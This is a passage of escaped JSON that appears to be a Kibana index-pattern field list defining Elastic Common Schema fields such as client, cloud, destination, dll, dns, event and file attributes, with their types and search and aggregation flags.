earchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],